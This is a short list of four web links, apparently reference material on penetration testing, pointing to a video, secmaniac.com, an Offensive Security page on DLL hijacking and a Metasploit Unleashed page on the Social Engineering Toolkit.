http://www.vimeo.com/14403642

http://www.secmaniac.com/

http://www.offensive-security.com/offsec/microsoft-dll-hijacking-exploit-in-action/

http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit